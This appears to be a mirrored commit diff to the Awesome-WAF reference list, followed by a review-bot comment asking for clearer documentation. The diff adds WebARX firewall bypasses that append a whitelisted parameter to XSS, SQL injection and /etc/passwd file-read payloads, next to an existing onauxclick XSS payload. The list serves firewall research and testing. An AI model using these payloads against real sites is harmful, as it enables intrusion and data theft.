mirror of
https://github.com/0xInfection/Awesome-WAF.git
synced 2024-12-22 23:33:27 +07:00
Update for more WebARX Bypasses
commit
1d0dd372e7
14
README.md
@ -3722,6 +3722,20 @@ http://host.com/test.asp?file=.%./bla.txt
|
|||||||
```
|
```
|
||||||
<a69/onauxclick=open()>rightclickhere
|
<a69/onauxclick=open()>rightclickhere
|
||||||
```
|
```
|
||||||
|
- [Bypassing All Protections Using A Whitelist String](https://osandamalith.com/2019/10/12/bypassing-the-webarx-web-application-firewall-waf/) by [@Osanda Malith](https://twitter.com/OsandaMalith)
|
||||||
|
|
||||||
|
- XSS PoC
|
||||||
|
```
|
||||||
|
http://host.com/?vulnparam=<script>alert()</script>&ithemes-sync-request
|
||||||
|
```
|
||||||
|
- LFI PoC
|
||||||
|
```
|
||||||
|
http://host.com/?vulnparam=../../../../../etc/passwd&ithemes-sync-request
|
||||||
|
```
|
||||||
|
- SQLi PoC
|
||||||
|
```
|
||||||
|
http://host.com/?vulnparam=1%20unionselect%20@@version,2--&ithemes-sync-request
|
||||||
|
```
|
||||||
|
|
||||||
### WebKnight
|
### WebKnight
|
||||||
- Cross Site Scripting by [@WAFNinja](https://waf.ninja/)
|
- Cross Site Scripting by [@WAFNinja](https://waf.ninja/)
|
||||||
|
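Review bot: The three added PoCs (XSS, LFI, SQLi) never say why each URL ends in `&ithemes-sync-request`, so a reader has to infer that this is the "whitelist string" from the link title above them. Add one sentence under the reference bullet stating that the appended parameter is the allowlisted string that leaves the rest of the request uninspected, and note the affected WebARX version and fix status from the linked write-up so defenders can tell whether their deployment is exposed. As a style point, the `- XSS PoC`, `- LFI PoC` and `- SQLi PoC` bullets sit at the same list level as the reference bullet; indenting them under it would make clear they belong to that one technique and not to the `onauxclick` entry before it.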